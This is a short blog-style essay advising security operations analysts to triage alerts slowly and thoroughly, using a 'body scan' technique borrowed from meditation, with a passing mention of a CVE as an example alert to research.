It’s Christmas morning. You wake up before everybody, run down the stairs, and beeline to the tree. You feverishly grab the closest present near you and tear it open! You realize it’s not that great, so you furiously grab the next one; this is boring too! The next and the next, unwrapping so you can open the next present. This is sometimes what it might look like for an observer watching an analyst work a queue.
It’s hard being an analyst. Often you’ll have multiple tickets working on fixing something, maybe some administrative tasks, and just maybe help a coworker in between all that. It’s easy to get caught up with other activities, and the queue can sometimes be viewed as something that can be knocked down so other things can be done. You have to remember one of the main tasks of an analyst is to be an analyst. That means looking at data, alerts, noticing trends, and identifying risks. It’s not easy. It doesn’t become easier by doing it faster either.
I want you to look at this photo below. Instead of glancing at it, I want you to take 3 minutes. Study it, identify all the objects, and determine the purpose of those objects.
How hard was that? Did you want to jump to this paragraph or even the picture below after only a minute, or did you find it easy? So how can one slow down? How can we fight that urge to jump to the next paragraph? I would like to use the methodology that is used in the world of meditation: it’s called the body scan. With body scan meditation, you pay close attention to your whole body and how it feels by mentally scanning from your feet to the top of your head (or in reverse) in a slow and deliberate progression.
Now let’s practice this with the next photo. Don’t worry about the time, but implement this practice of scanning the picture. Start in the top left and work your way to the right, then go down slightly, then go to the left. Once you’ve reached the end, scan your way back up the picture.
Even though you weren’t watching the time, you’ve probably spent just as much or even more time than you had before. You might have seen things you wouldn’t have seen otherwise. So, we’ve looked at a few pictures, but how will this help us be better analysts? Well, when you get an alert, instead of being a Tasmanian Devil on Christmas morning, do a “body scan” on the alert. Look at the time it happened and the name of the alert. If it talks about CVE-2022-23302, for example, do you know what that means? What does a successful attack look like? If you don’t know, go research. Open the alert, read the description, look at the data that is given, and go back over it; when you have an understanding of what you’re supposed to be looking for, THEN look at additional data to determine if it’s a false or true positive. Look at the surrounding activity – what happened before the alert? What happened after the alert? Do this with every alert. It’s not easy, especially if the queue is full of low-fidelity alerts, but we’ll tackle that topic in a post you can find here.
Being an analyst isn’t easy, even though it’s deemed an entry-level job in the security field. It’s far from that if you want to be good. The first step to being a better analyst is to slow down and observe everything. Slowing down can help direct your investigation and prevent you from going down fruitless rabbit holes. Body scan your alerts for a day and see if you start noticing anything different. You’ll be surprised how much you skimmed over previously.